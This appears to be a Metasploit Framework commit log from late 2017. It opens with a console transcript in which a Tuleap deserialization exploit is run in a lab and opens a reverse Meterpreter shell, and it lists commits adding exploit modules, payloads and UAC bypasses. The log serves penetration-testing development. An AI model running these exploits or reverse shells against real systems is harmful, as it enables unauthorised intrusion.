[+] localhost:443 The target is vulnerable.

msf exploit(tuleap_rest_unserialize_exec) > set PAYLOAD php/meterpreter/reverse_tcp
msf exploit(tuleap_rest_unserialize_exec) > ifconfig docker0 | grep "inet:" | awk -F'[: ]+' '{ print $4 }'
msf exploit(tuleap_rest_unserialize_exec) > set LHOST 172.17.0.1
msf exploit(tuleap_rest_unserialize_exec) > exploit 

[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Trying to login through the REST API...
[+] Login successful with test:p4ssw0rd
[*] Updating user preference with POP chain string...
[*] Retrieving the CSRF token for login...
[+] CSRF token: 01acd8380d98c587b37ddd75ba8ff6f7
[+] Login successful with test:p4ssw0rd
[*] Triggering the POP chain...
[*] Sending stage (33721 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:56572) at 2017-11-01 16:07:01 +0100

meterpreter > getuid 
Server username: codendiadm (497)
```
2017-11-01 16:09:14 +01:00
Brent Cook a347dee372 Land #9150, fix broken and simplify unusual RuntimeError exceptions 2017-11-01 06:03:36 -05:00
Brent Cook 90766ceceb remove more unusual raise RuntimeError patterns 2017-11-01 05:59:12 -05:00
Spencer McIntyre 1462330f34 Add tab completion to the payload generate command 2017-10-31 20:33:31 -04:00
lvarela-r7 c36184697c Merge pull request #9150 from bcook-r7/runtimeerror
Fix several broken raise RuntimeError calls in error paths
2017-10-31 14:47:42 -05:00
Brent Cook f1e6e7eed5 Land #9107, add MinRID to complement MaxRID 2017-10-31 12:18:28 -05:00
Pearce Barry 48975a4327 Support multiple suffixes on meterpreter extensions. 2017-10-31 10:04:34 -05:00
Pearce Barry daf2acc2b1 Initial work to support Mettle exetensions (and a sniffer).
See MS-2775.
2017-10-31 10:04:30 -05:00
Brent Cook 95b6cda06e Land #9146, add e500v2 and reduce size of x86_64 2017-10-31 09:54:07 -05:00
Brent Cook c4dcd79e41 Land #9144, fix misspelling in exploit/windows/local/wmi_persistence 2017-10-31 05:01:13 -05:00
Brent Cook aa0ac57238 use implicit RuntimeError 2017-10-31 04:53:14 -05:00
Brent Cook 9389052f61 fix more broken RuntimeError calls 2017-10-31 04:45:19 -05:00
Brent Cook f42b980cf0 fix misspelled RuntimeError 2017-10-30 15:42:11 -05:00
Brent Cook 56eb828cc5 add e500v2 payloads 2017-10-30 14:04:10 -05:00
Brent Cook 22f9626186 update sizes 2017-10-30 05:26:29 -05:00
Brent Cook ebaf0c5484 bump mettle, update toolchain, add e500v2 and reduce size of x86_64 2017-10-30 05:09:31 -05:00
Spencer McIntyre 940573ad49 Support ruby directives in Meterpreter rc scripts 2017-10-29 15:57:33 -04:00
h00die 3b8ef02c29 sid vs side 2017-10-29 08:36:05 -04:00
RootUp 9c16da9c98 Update ibm_lotus_notes2.rb 2017-10-28 18:53:15 +05:30
Brent Cook e70ca74c15 Land #9137, Add module support for sessions -s 2017-10-27 19:57:52 -05:00
Steven Patterson b96fa690a9 Add brackets to print functions 2017-10-27 15:23:22 -04:00
William Vu 9349e1eda5 Fix find_script_path to check only files 2017-10-27 12:28:58 -05:00
William Vu 73c9807c55 Add module support for sessions -s 2017-10-27 12:28:53 -05:00
Metasploit 140955f220 Bump version of framework to 4.16.14 2017-10-27 10:03:00 -07:00
Brent Cook 7705efee90 Land #9136, bump metasploit payloads, windows meterpreter fixes 2017-10-27 09:58:19 -07:00
Brent Cook 254c2a33d3 bump metasploit payloads, windows meterpreter fixes 2017-10-27 11:44:23 -05:00
sho-luv 587c9673c6 Added host and port to output
I added the host and port number to reporting when instances are found.
2017-10-27 09:34:49 -07:00
h00die 037c58d1f6 wp-mobile-detector udpates 2017-10-27 10:10:04 -04:00
Brent Cook d188982760 handle masked EOF from Rex sockets (TODO: kill that behavior) 2017-10-27 02:29:25 -07:00
Brent Cook 85b59c87ca fix buggy handling of partial ingress packet data
If we have more data, and the packet parser needs more data, connect the two
together rather than bailing. This fixes reverse_tcp_ssl along with probably a
lot of other higher-latency corner cases.
2017-10-27 02:15:08 -07:00
Steven Patterson 8613852ee8 Add Mako Server v2.5 command injection module/docs 2017-10-26 23:29:11 -04:00
Brent Cook 2682e6ed91 Land #9132, Restore changes from PR #8933 2017-10-26 17:17:03 -07:00
Jeffrey Martin cd755b05d5 update powershell specs for rex-powershell 0.1.77 2017-10-26 15:03:10 -05:00
Jeffrey Martin 43b67fe80b remove errant bracket, formatting update 2017-10-26 15:01:53 -05:00
dmohanty-r7 805dcb2db6 Land #9128, New RC script for dev-related vulns 2017-10-25 16:41:05 -05:00
Jeffrey Martin f2cba8d920 Land #8933, Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary)
This restores the original PR
2017-10-25 16:29:11 -05:00
Jeffrey Martin ca28abf2a2 Revert "Land #8933, Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary)"
This reverts commit 4999606b61, reversing
changes made to 4274b76473.
2017-10-25 16:19:14 -05:00
Jeffrey Martin 87d34bef63 Revert "missing update to Gemfile.lock"
This reverts commit 9961c70cda.
2017-10-25 16:13:25 -05:00
Jeffrey Martin 0a858cdaa9 Revert "fix my comments from #8933"
This reverts commit 02a2839577.
2017-10-25 16:13:00 -05:00
Pearce Barry eb3f7f949b Fix formatting (again, sigh...). 2017-10-25 15:45:59 -05:00
Pearce Barry f458f214db Loop do, yo. 2017-10-25 15:43:25 -05:00
Pearce Barry 43aac0ca5e PR feedback and add java module and scanner. 2017-10-25 15:39:23 -05:00
Jeffrey Martin 9961c70cda missing update to Gemfile.lock 2017-10-25 15:07:36 -05:00
Jeffrey Martin a402686d7a add missing spec for singles/python/shell_bind_tcp 2017-10-25 14:58:49 -05:00
Jeffrey Martin 02a2839577 fix my comments from #8933 2017-10-25 14:46:41 -05:00
Jeffrey Martin f7e2fb3164 Land #9121, Bump rex-socket to pick up better certs 2017-10-25 14:06:13 -05:00
Jeffrey Martin 4999606b61 Land #8933, Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary) 2017-10-25 12:44:04 -05:00
Pearce Barry 84686e1ab1 Fix formatting. 2017-10-25 11:41:14 -05:00
Jeffrey Martin 4274b76473 Land #9119, Fix #8436, allow session upgrading on meterpreter sessions 2017-10-25 10:26:27 -05:00
Pearce Barry 4fc0eb0cb3 New resource script to check for development-related vulns. 2017-10-25 10:11:25 -05:00
Pearce Barry a2930935ba Land #9122, Add resource scripts to check & verify common SMB vulnerabilities 2017-10-25 07:21:08 -05:00
Pearce Barry c4c093b249 Method typo fix. 2017-10-25 07:06:18 -05:00
RootUp 80aba7264c Update ibm_lotus_notes2.rb 2017-10-25 10:33:25 +05:30
Jeffrey Martin 270ec2e9e6 Bump rex-socket to pick up better certs 2017-10-24 16:39:01 -05:00
Jeffrey Martin 386e14828a Land #8728, Psexec via PSH related fixes 2017-10-24 15:55:18 -05:00
Wei Chen d8b2e7a13d Add resource scripts to check & verify common SMB vulnerabilities
This adds two resource scripts in order to check and verify common
SMB vuns that Metasploit can do:

* smb_checks.rc
* smb_validate.rc
2017-10-24 09:19:02 -07:00
Tim 40e57d7ee6 android payload options 2017-10-24 18:32:47 +08:00
Brent Cook 8004b9de06 Land #9118, pull in fix for rapid7/metasploit-payloads#238 2017-10-23 23:04:35 -05:00
Brent Cook 50c533a452 update cached sizes 2017-10-23 23:04:02 -05:00
Tim 7e398e2ef5 Fix #9111, bump metasploit-payloads gem to include php 5.3.10 fix 2017-10-24 11:40:02 +08:00
Brent Cook 1b01232624 Land #9070, Fix bug copying MACE attributes between files 2017-10-23 22:15:42 -05:00
Brent Cook 402e926151 Land #9081, Fix ftp.rb to get files larger than 16384 2017-10-23 22:11:36 -05:00
Brent Cook c6bc55a175 Land #9082, Fix ftp.rb so it closes all data sockets 2017-10-23 22:10:38 -05:00
Brent Cook 970fe2956e Land #9115, add python/shell_bind_tcp back 2017-10-23 16:38:33 -05:00
mumbai 19859f834d re-add payload 2017-10-23 10:20:19 -04:00
Maurice Popp df14dc4452 autodetection fixing 2017-10-23 09:07:46 +02:00
h00die cd35ae4661 Land #9106 negear dgn1000 unauth rce module 2017-10-22 22:18:53 -04:00
h00die 210f6f80b7 netgear1000dng cleanup 2017-10-22 22:17:40 -04:00
Austin eff94be951 Update netgear_dgn1000_setup_unauth_exec.rb 2017-10-22 16:55:40 -04:00
Austin e9fdb5bd94 Create netgear_dgn1000_unauth_setup_exec.md 2017-10-22 16:54:06 -04:00
Austin 6f37bbb1d6 fix EDB 2017-10-22 16:11:19 -04:00
Tim ca4feb5136 fix session upgrading 2017-10-23 01:26:45 +08:00
Austin c7e35f885b add disc date 2017-10-21 20:13:25 -04:00
Austin e0831c1053 hopefully fix header..? 2017-10-21 18:38:32 -04:00
Austin 8239d28323 fix header 2017-10-21 09:07:18 -04:00
Dave Farrow 636551aa03 Fixed help message to match test 2017-10-20 21:32:54 -07:00
Dave Farrow afe067fca5 commited file to the wrong place 2017-10-20 21:22:31 -07:00
Dave Farrow ecada96585 #9108: fixed unit test 2017-10-20 21:20:36 -07:00
Dave Farrow 8d035ccd40 #9108: fixed broken unit test 2017-10-20 21:10:56 -07:00
Dave Farrow ea1ac3d5b3 #9108: added -C option to change default hosts columns
The -C option saves the column list the user provided and uses that as the default column list until msfconsole is restarted
2017-10-20 20:39:38 -07:00
h00die cfd7761818 wp_mobile_detector rce 2017-10-20 23:19:58 -04:00
Austin 40e508f2ad correct mistake 2017-10-20 22:26:54 -04:00
Austin ac21567743 Fix requested changes 2017-10-20 22:17:04 -04:00
mumbai 8b8bebd782 remove payload 2017-10-20 20:27:15 -04:00
mumbai b255ddf8d6 New NETGEAR module 2017-10-20 20:25:11 -04:00
Jon Hart 9658776adf Land #9079, adding @h00die's gopher scanner 2017-10-20 17:16:08 -07:00
mumbai 2f371c9784 Netgear MODULE UNAUTH 2017-10-20 20:15:36 -04:00
mumbai 2e376a1b6a Merge remote-tracking branch 'upstream/master' into netgear_dgn1000_unauth_setup_exec 2017-10-20 20:13:29 -04:00
h00die f250e15b6e Land #9105 rename psh to polycom for name collision 2017-10-20 20:10:57 -04:00
h00die fd028338e1 move psh to polycom so no more powershell name collision 2017-10-20 20:08:11 -04:00
h00die 5a6da487ab Land #9043 two exploit modules for unitrends backup 2017-10-20 20:00:35 -04:00
h00die 5abdfe3e59 ueb9 style cleanup 2017-10-20 19:59:24 -04:00
h00die c517ded3ae Merge pull request #7 from jhart-r7/pr/9079-gopher
Gopher improvements
2017-10-20 19:25:03 -04:00
caleBot c26779ef54 fixed msftidy issues 2017-10-20 14:39:39 -06:00
caleBot 8f622a5003 Update ueb9_bpserverd.rb 2017-10-20 14:35:03 -06:00
caleBot cce7bf3e19 Update ueb9_bpserverd.rb 2017-10-20 14:33:46 -06:00
Brent Cook d715f53604 add MinRID to complement MaxRID, allowing continuing or starting from a higher value
from @lvarela-r7
2017-10-20 15:32:25 -05:00
caleBot 85152b5f1e added check function 2017-10-20 14:28:52 -06:00
caleBot e9ad5a7dca Update ueb9_api_storage.rb 2017-10-20 14:05:15 -06:00
caleBot 16b6248943 Update ueb9_bpserverd.rb 2017-10-20 13:58:12 -06:00
caleBot 5c0bcd8f0a Update ueb9_bpserverd.rb 2017-10-20 13:56:25 -06:00
caleBot abc749e1e8 Update ueb9_api_storage.rb 2017-10-20 13:48:29 -06:00
caleBot 8febde8291 Update ueb9_api_storage.rb 2017-10-20 12:23:53 -06:00
caleBot e8de6a46d5 Update ueb9_bpserverd.md 2017-10-20 12:21:17 -06:00
Jon Hart f938a1029b Make note about stopping container after 2017-10-20 10:30:12 -07:00
Jon Hart e82cb4577d Show module selection + config 2017-10-20 10:12:46 -07:00
Jon Hart a8b4d4e4a2 Link to gopher container 2017-10-20 10:04:09 -07:00
Metasploit 884b68fa60 Bump version of framework to 4.16.13 2017-10-20 10:02:23 -07:00
Jon Hart 811bae7361 Add docker go(pher) example 2017-10-20 09:59:25 -07:00
Jon Hart 664e774a33 style/rubocop cleanup 2017-10-20 09:44:07 -07:00
William Vu c795cef69f Land #9099, disconnect option for send_request_cgi 2017-10-20 10:50:56 -05:00
Brent Cook 1319175dd8 Land #9102, Fix nil bug in setting PromptChar without Prompt 2017-10-20 08:36:53 -05:00
William Vu 8e5deac3f4 Fix nil bug in setting PromptChar without Prompt 2017-10-20 00:38:01 -05:00
William Vu e9416775d9 Land #9100, typo fix for MS07-017 exploit 2017-10-19 22:55:31 -05:00
RageLtMan a3912e4913 Provide disconnect option to send_request_cgi
The HTTP client mixin provides a #send_request_cgi method which
forcibly disconnects the client after receiving a response. This
terminates certain types of resulting sessions which depend on the
connection from the client to maintain a subprocess housing the
shell invocation.

Provide a disconnect boolean option to #send_request_cgi which
is checked in the disconnect(c) call after receiving the response.

Testing:
  Locally tested on in-house exploit module written for disclosure
report.

TODO:
  Discuss possibility of implementing fully asynchronous methods
like #send_request_cgi_async which won't bother getting a response
for cases such as the module mentioned above which is a command
injection via unfiltered POST var.
2017-10-19 21:22:31 -04:00
Kent Gruber 7cd532c384 Change targetr to target to fix small typo bug on one failure
The target object seems to have a typo where it is referred to as
“targetr” which I’d guess isn’t exactly what we’d like to do in this
case. So, I’ve changed that to “target” in order to work.

So, I’ve simply fixed that small typo.
2017-10-19 19:55:58 -04:00
Brent Cook 54d64cdcc5 Land #9064, add aggregator >= 1.0.0 with cryptTLV packet format 2017-10-19 14:51:50 -05:00
mumbai 04a24e531b New module 2017-10-18 21:37:26 -04:00
Jeffrey Martin 5458b58a74 restrict aggregator on arm for now 2017-10-18 13:21:02 -05:00
mumbai 2f98f2bc2a Merge remote-tracking branch 'upstream/master' 2017-10-17 21:16:47 -04:00
Austin 7098372f58 Update shell_bind_tcp.rb 2017-10-17 19:33:10 -04:00
William Vu 60a7a80ff0 Land #9095, default PromptTimeFormat (%T) 2017-10-17 16:50:47 -05:00
James Lee af42f517b8 Default PromptTimeFormat to %T 2017-10-17 16:39:44 -05:00
mumbai 858bb26b56 Adding python/shell_bind_tcp, for an avaialable option 2017-10-17 07:36:45 -04:00
Tim 697b8935ba Land #9091, fix linux x86 elf-so generation 2017-10-17 14:30:01 +08:00
Evgeny Naumov d5cdd2567a add missing method 2017-10-16 16:01:53 -04:00
William Vu 7e338fdd8c Land #9086, proxying fix for nessus_rest_login 2017-10-16 11:52:04 -05:00
William Vu df8261990d Land #9085, proxying fix for pop3_login 2017-10-16 11:38:24 -05:00
Jeffrey Martin b04f5bdf90 Land #9077, Enhancing the functionality on the nodejs shell_reverse_tcp payload. 2017-10-16 10:49:17 -05:00
Hanno Heinrichs 9597157e26 Make nessus_rest_login scanner proxy-aware again 2017-10-14 11:16:41 +02:00
Hanno Heinrichs f4ae2e6cdc Make pop3_login scanner proxy-aware again 2017-10-14 11:05:54 +02:00
itsmeroy2012 9afc8b589c Updating the payload sizes 2017-10-14 11:05:44 +05:30
Indranil Roy b8d0986428 Merge pull request #7 from jmartin-r7/adjust_9077_whitespace
Adjust whitespace per desired style
2017-10-14 10:55:26 +05:30
Wei Chen c67a5872cd Land #9055, Add exploit for Sync Breeze HTTP Server
Land #9055
2017-10-13 17:34:03 -05:00
Jeffrey Martin 6df8c40bb1 adjust whitespace 'no tabs' more reabable 2017-10-13 17:01:47 -05:00
Wei Chen 3a2c6128be Support automatic targeting 2017-10-13 16:53:22 -05:00
Wei Chen 6b89f62b08 Land #9080, ensure autoruns on shell sessions
Land #9080
2017-10-13 15:35:31 -05:00
Wei Chen 5ce4c32213 Use session object instead of self
The session object has :process_autoruns, not self
2017-10-13 15:33:27 -05:00
William Vu b2de5aba07 Fix #9075, super setup fix for local exploits 2017-10-13 12:45:14 -05:00
bigendiansmalls 1b306caf39 Fixed ftp.rb to get files larger than 16384
Existing ftp.rb did get_once, which limits file
DL to 16384 (def_block_size). Change to get and
added one more timeout variable see:
http://www.rubydoc.info/gems/librex/Rex%2FIO%2FStream:def_block_size
and
http://www.rubydoc.info/gems/librex/Rex%2FIO%2FStream:get_once
and
http://www.rubydoc.info/gems/librex/Rex%2FIO%2FStream:get
2017-10-13 12:41:11 -05:00
Metasploit 88585a5cfd Bump version of framework to 4.16.12 2017-10-13 10:03:48 -07:00
bigendiansmalls e5e9c7ccd6 Fixed ftp.rb so it closes all data sockets
ftp.rb was doing a shutdown without a close on data
(not command) sockets.  This can cause CLOSE_WAIT
for extended periods in certain circumstances-ending
only when msf itself is closed.
2017-10-13 10:09:43 -05:00
Brent Cook e209256d62 ensure we do autoruns for all session types 2017-10-12 23:11:58 -05:00
h00die 297ca25953 fix IPs 2017-10-12 21:40:27 -04:00
h00die a63c947768 gopher proto 2017-10-12 21:32:01 -04:00
Adam Cammack 9b219f42c5 Land #9029, Fix Linux post module file assumptions 2017-10-12 17:56:40 -05:00
Adam Cammack deb2d76678 Land #9058, Add proxies back to smb_login 2017-10-12 17:31:45 -05:00
William Vu 5b40febdc5 Land #9075, missing setup fix for post modules 2017-10-12 12:24:46 -05:00
William Vu bf2fb7051a Fix session compatibility check for post modules 2017-10-12 11:57:11 -05:00
itsmeroy2012 a0abffb6c4 Adding functionality of StagerRetryWait and StagerRetryCount 2017-10-12 22:25:00 +05:30
William Vu f556a5f805 Add compatible session types to post module info 2017-10-12 11:41:02 -05:00
itsmeroy2012 374c139d33 Increasing the functionality of the nodejs shell_reverse_tcp payload 2017-10-12 19:05:59 +05:30
William Webb 8cfd4928ed Land #9069, Add docs for scanner/http/open_proxy 2017-10-11 23:08:07 -05:00
Wei Chen d0e65a4177 Land #9068, add doc for auxiliary/scanner/http/files_dir
Land #9068
2017-10-11 17:13:26 -05:00
Wei Chen eaf686f164 Fix format 2017-10-11 17:12:45 -05:00
Wei Chen 3a8a85bbe5 Land #9065, add doc for auxiliary/scanner/http/http_login
Land #9065
2017-10-11 17:09:35 -05:00
Wei Chen fc40fe0da2 Fix format 2017-10-11 17:08:49 -05:00
Wei Chen 2503d2ab2e Land #9067, add doc for auxiliary/scanner/http/http_header
Land #9067
2017-10-11 17:03:29 -05:00
Wei Chen 17b4678998 Fix format 2017-10-11 17:02:41 -05:00
Indranil Roy 72291d31fb Update open_proxy.md 2017-10-12 03:29:49 +05:30
itsmeroy2012 17d7faa96b fixing typos 2017-10-12 03:00:09 +05:30
bwatters-r7 294230c455 Land #8509, add Winsxs bypass for UAC 2017-10-11 16:24:52 -05:00
Indranil Roy 763720cc4a Merge pull request #6 from rapid7/master
updating master
2017-10-12 02:31:38 +05:30
Jeffrey Martin cfaa34d2a4 more style cleanup for tomcat_jsp_upload_bypass 2017-10-11 15:53:35 -05:00
Wei Chen 978ede363e Land #9066, add doc for http_version
Land #9066
2017-10-11 15:39:44 -05:00
Jeffrey Martin 9885dc07f7 updates for style 2017-10-11 15:29:47 -05:00
Jeffrey Martin 1786634906 Land #9059, Tomcat JSP Upload via PUT Bypass 2017-10-11 15:05:00 -05:00
William Webb 84fe0847bf Land #9074, Add prints and error checking to HTTP CmdStagers 2017-10-11 14:27:52 -05:00
Wei Chen 8b3cc2b94f Tweak format 2017-10-11 14:14:56 -05:00
William Vu 569b68bee2 Update rex-exploitation to 0.1.15 2017-10-11 14:09:35 -05:00
William Vu 27876a91d3 Add prints and better checking to HTTP CmdStagers
Admittedly, this code is more convoluted than it needs to be.
2017-10-11 14:01:56 -05:00
Jeffrey Martin df1f7dfb84 Land #9072, remove invalid 'client' object reference in nodejs 2017-10-11 12:12:03 -05:00
Jeffrey Martin b76c1f3647 remove invalid 'client' object reference in nodejs
fix #9063 by removing invalid object reference introduced in PR #8825
2017-10-11 11:09:28 -05:00
Bradley Landherr bdc00ef2df Removing unecessary comment 2017-10-11 06:34:09 -07:00
Bradley Landherr 8dee369eb7 Fixing the -f option, removing reference to undefined 'path' variable & get_file_mace already returns a 'Time' object instance 2017-10-11 06:28:03 -07:00
root 03e7797d6c fixed msftidy errors and added documentation 2017-10-11 07:57:01 -04:00
itsmeroy2012 1c8871cbe3 Documentation on auxiliary module open_proxy 2017-10-11 16:29:56 +05:30
itsmeroy2012 579cfed5f4 Documentation on auxiliary module files_dir 2017-10-11 16:15:19 +05:30
itsmeroy2012 fcf6a1ec96 Documentation on http_header 2017-10-11 15:30:43 +05:30
itsmeroy2012 e526b37e81 Fixing whitespaces 2017-10-11 15:18:51 +05:30
itsmeroy2012 ee3b638b48 Changing description 2017-10-11 15:17:54 +05:30
itsmeroy2012 7f1f862dc2 KB for http_version 2017-10-11 15:14:22 +05:30
Ernesto Fernandez 32eb1e9fe6 Merge pull request #1 from bwatters-r7/prep-8509
bypassuac_injection_winsxs updates and documents
2017-10-11 11:43:57 +02:00
Ernesto Fernandez ffa29de6c9 Update bypassuac_injection_winsxs.md 2017-10-11 11:43:28 +02:00
itsmeroy2012 d64312c24f Changing description 2017-10-11 14:55:48 +05:30
itsmeroy2012 9ebf8328ee adding colon 2017-10-11 14:51:53 +05:30
itsmeroy2012 26c45f4c74 adding new sub heading 2017-10-11 14:47:19 +05:30
itsmeroy2012 3f411a5559 separating sections 2017-10-11 14:45:34 +05:30
itsmeroy2012 9ceaa39451 removing whitespaces 2017-10-11 14:44:01 +05:30
itsmeroy2012 064f4d56aa adding label 2017-10-11 14:43:06 +05:30
itsmeroy2012 d32edfd53e Documentation for http_login 2017-10-11 14:39:05 +05:30
Jeffrey Martin c478133539 add aggregator >= 1.0.0 with cryptTLV support 2017-10-10 23:19:44 -05:00
h00die e976a91b15 land #9053 RCE for rend micro imsva 2017-10-10 19:27:06 -04:00
Wei Chen a4bc3ea3c2 Merge branch 'pr9032' into upstream-master
Land #9032, Improve CVE-2017-8464 LNK exploit

Land #9032
2017-10-10 17:11:51 -05:00
Adam Cammack 88f53352c7 Land #9056, Check for /etc/issue before reading 2017-10-10 15:05:27 -05:00
Indranil Roy ba0b270b1b Merge pull request #5 from rapid7/master
merging master #5
2017-10-10 23:48:46 +05:30
bwatters-r7 59d03ec4db Added markdown doc for documentation. 2017-10-10 13:05:29 -05:00
William Vu ab63caef7b Land #9009, Apache Optionsbleed module 2017-10-10 12:13:40 -05:00
jakxx fd0ce33341 Updated Module Documentation 2017-10-10 12:36:32 -04:00
bwatters-r7 fd963245a4 Recompiled old binaries that used
external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp
to make sure the changes don't break them later.
2017-10-10 11:28:49 -05:00
Jeffrey Martin 57afc3b939 Land #9044, Address generation issues with pure PSH payloads 2017-10-10 10:40:33 -05:00
RootUp 2b85eb17dd Create ibm_lotus_notes2.rb 2017-10-10 12:22:06 +05:30
Mehmet Ince fb16f1fbda Disabling bind type payloads 2017-10-10 09:37:24 +03:00
peewpw facc38cde1 set timeout for DELETE request 2017-10-09 21:53:31 -04:00
Jeffrey Martin b83787c24c make powershell spec more specific in expectations 2017-10-09 20:02:32 -05:00
h00die 850aeda097 land #9052 RCE of Trend Micro OfficeScan 2017-10-09 20:46:30 -04:00
Pearce Barry a3d47ea838 Land #8989, IBM Lotus Notes DoS (CVE-2017-1129) 2017-10-09 19:37:59 -05:00
h00die b796c0be16 fixing docs 2017-10-09 20:31:23 -04:00
Pearce Barry fd8b72ca66 Minor tweaks. 2017-10-09 17:02:24 -05:00
Hanno Heinrichs 15adb82b96 Make smb_login scanner proxy-aware again 2017-10-09 23:01:25 +02:00
Mehmet Ince a2d32b460c Fixing grammer issue 2017-10-09 22:31:13 +03:00
Mehmet Ince c14c93d450 Integrate OfficeScan 11 exploitation and fix grammer issues 2017-10-09 22:11:42 +03:00
h00die bf731b4f5e look before leap issues 2017-10-09 14:27:09 -04:00
jakxx ef282ea154 Sync Breeze HTTP Server v10.0.28 BOF
Added support for v10.0.28 to Sync Breeze BOF module
2017-10-09 13:50:24 -04:00
bwatters-r7 c63d5fb4fb Recompiled binaries 2017-10-09 12:44:58 -05:00
Adam Cammack 436b72d4cc Land #9023, Add tab completion to the edit command 2017-10-09 11:37:12 -05:00
bwatters-r7 0bf948e906 Removed binary files before recompiling 2017-10-09 11:35:41 -05:00
William Vu 27dcc162b2 Revert to Vim because ed is the standard editor
https://www.gnu.org/fun/jokes/ed-msg.html
2017-10-09 11:34:45 -05:00
William Webb 14308fb77d Land #9045, Copy original request ID into TLV response 2017-10-09 10:58:02 -05:00
bwatters-r7 fc5ab96ad6 Merging to prep for testing
Merge branch 'master' of github.com:rapid7/metasploit-framework into upstream-master
2017-10-09 10:31:30 -05:00
bwatters-r7 7df18e378d Fix conflicts in PR 8509 by mergeing to master 2017-10-09 10:30:21 -05:00
Martin Pizala 6d28a579f3 send_request_cgi instead of send_request_raw 2017-10-09 13:12:48 +02:00
peewpw be8680ba3d Create tomcat_jsp_upload_bypass.rb
Created a module for CVE-2017-12617 which uploads a jsp payload and executes it.
2017-10-08 21:48:47 -04:00
Spencer McIntyre 3f6f70f820 Move the cve-2017-8464 source to external/source 2017-10-08 13:58:51 -04:00
Mehmet Ince 395c82050b Adding Trend Micro IMSVA Widget RCE 2017-10-08 18:15:32 +03:00
Mehmet Ince 79c9123261 Adding Trend Micro OfficeScan widget rce module 2017-10-08 17:54:18 +03:00
Martin Pizala 33ec3c3d69 Error handling and style 2017-10-08 13:51:16 +02:00
Martin Pizala d8ff99b1f6 Change to ARCH_X64, remove python dependency 2017-10-08 13:51:07 +02:00
h00die 015e30c4f3 land #9048 docs for xmas portscan 2017-10-07 15:50:41 -04:00
Deepanshu Gajbhiye d28b023058 Update xmas.md
added requested changes.
2017-10-08 00:16:43 +05:30
h00die 7a87e11767 land #8781 Utilize Rancher Server to exploit hosts 2017-10-07 13:04:34 -04:00
Maurice Popp b7184e87c0 fixing a type 2017-10-07 14:16:01 +02:00
Maurice Popp 8d50c34e4b codefixing 2017-10-07 14:06:58 +02:00
Deepanshu Gajbhiye fa98fe4fe6 Update xmas.md
removed blank spaces.
2017-10-07 14:20:19 +05:30
Deepanshu Gajbhiye 0e6843eae1 Update xmas.md 2017-10-07 04:40:28 -04:00
Deepanshu Gajbhiye 3092ad9ea0 Documentation for auxiliary/scanner/portscan/xmas 2017-10-07 04:23:40 -04:00
Martin Pizala 34d119be04 Payload space, error handling and style" 2017-10-07 01:12:24 +02:00
James Barnett 56e95f15c9 Land #9024, fix bug when manually adding loot
cmd_loot was throwing a stack trace when the host was not properly defined.
This fixes it to give a useful error message.
2017-10-06 16:02:12 -05:00
RageLtMan 37e06839f8 Merge pull request #24 from bwatters-r7/update-cache-sizes
update cached payload sizes
2017-10-06 16:40:53 -04:00
Jeffrey Martin d0a1fb6019 tlv response to ID based request with original ID
When a tlv response is created the request ID being responded to
needs to be copied into response created.
2017-10-06 13:58:38 -05:00
William Webb d9e0d891a1 Land #9010, Remove checks for hardcoded SYSTEM account name 2017-10-06 13:42:18 -05:00
h00die 7535fe255f land #8736 RCE for orientdb 2017-10-06 14:35:42 -04:00
h00die e7aa06c1c4 fix documentation 2017-10-06 14:29:39 -04:00
bwatters-r7 f996597bcf update cached payload sizes 2017-10-06 13:19:00 -05:00
RageLtMan 124a1531f4 Clean up powershell exec string
The scriptblock invocation is already coming from Rex, so there's
no need to re-wrap the executed code in more of the same.
2017-10-06 13:19:36 -04:00
Metasploit 4acef04e0d Bump version of framework to 4.16.11 2017-10-06 10:01:51 -07:00
caleBot 752d21e11c forgot a comma 2017-10-06 10:47:42 -06:00
RageLtMan 9afdde2938 Address generation issues with pure PSH payloads
Powershell payloads were generating using the :generate method
mixed in from Payload::Windows::Exec which is a binary payload
mixin.

Address the breakage by implementing a generate method which simply
outputs the script code produced by the module with no additional
content prepended or appended.

While here, cleanup the commandline generation for the script being
produced by having Rex do it (this permits changes made in Rex to
benefit all consumers).

As a bonus, drop the IEX invocation since it'll trip up AMSI and
upgrade to the scripblock execution semantic.

Credit for finding this little gem goes to bperry - i dont usually
use the native powershell command shells, and managed to miss this
for a long time. Thanks boss.

Testing:
  Local in pry

@bperry: Could you test and ping me back if this is right?
2017-10-06 12:32:52 -04:00
caleBot 63e3892392 fixed issues identified by msftidy 2017-10-06 10:16:01 -06:00
caleBot 78e262eabd fixed issues identified by msftidy 2017-10-06 10:15:30 -06:00
caleBot 36610b185b initial commit for UEB9 exploits - CVE-2017-12477, CVE-2017-12478 2017-10-06 09:38:33 -06:00
M4P0 7fe750422e Update geutebrueck_gcore_x64_rce_bo.md 2017-10-06 15:41:12 +02:00
Maurice Popp 770547269b added documentation, and fixed 4 to 2 indentation 2017-10-06 15:39:25 +02:00
Brent Cook c701a53def Land #9018, Add Bind Shell JCL Payload for z/OS 2017-10-05 17:24:50 -05:00
Brent Cook 7292ee24a2 Land #9027, Cleanup revshell for zos 2017-10-05 17:20:01 -05:00
Brent Cook 4a745bd2cc Land #8991, post/windows/manage/persistence_exe: fix service creation 2017-10-05 17:04:58 -05:00
Brent Cook 9d2e8b1e4d Land #8003, Evasions for delivering nops/shellcode into memory 2017-10-05 16:44:36 -05:00
Brent Cook 809d0f79a1 Land #9026, Fix cache invalidation bug in tab completion 2017-10-05 16:41:00 -05:00
Brent Cook b7e209a5f3 Land #9033, Geolocate API update 2017-10-05 16:39:09 -05:00
Spencer McIntyre e4d99a14b6 Fix EXITFUNC back to process for the RCE too 2017-10-05 11:38:08 -04:00
Spencer McIntyre 4729c885f1 Cleanup the CVE-2017-8464 LPE module 2017-10-05 11:10:37 -04:00
Spencer McIntyre d0ebfa1950 Change the template technicque to work as an LPE 2017-10-05 10:30:28 -04:00
Spencer McIntyre 825ad940e6 Update the advanced option names and a typo 2017-10-05 10:16:31 -04:00
Spencer McIntyre 482ce005fd Update the advanced option names and a typo 2017-10-05 10:11:00 -04:00
Pearce Barry 7400082fdb Land #9040, Add CVE and Vendor article URL to the denyall_waf_exec module 2017-10-04 09:12:48 -05:00
Mehmet Ince 110f3c9b4a Add cve and vendor article to the denyall_waf_exec module 2017-10-04 12:11:58 +03:00
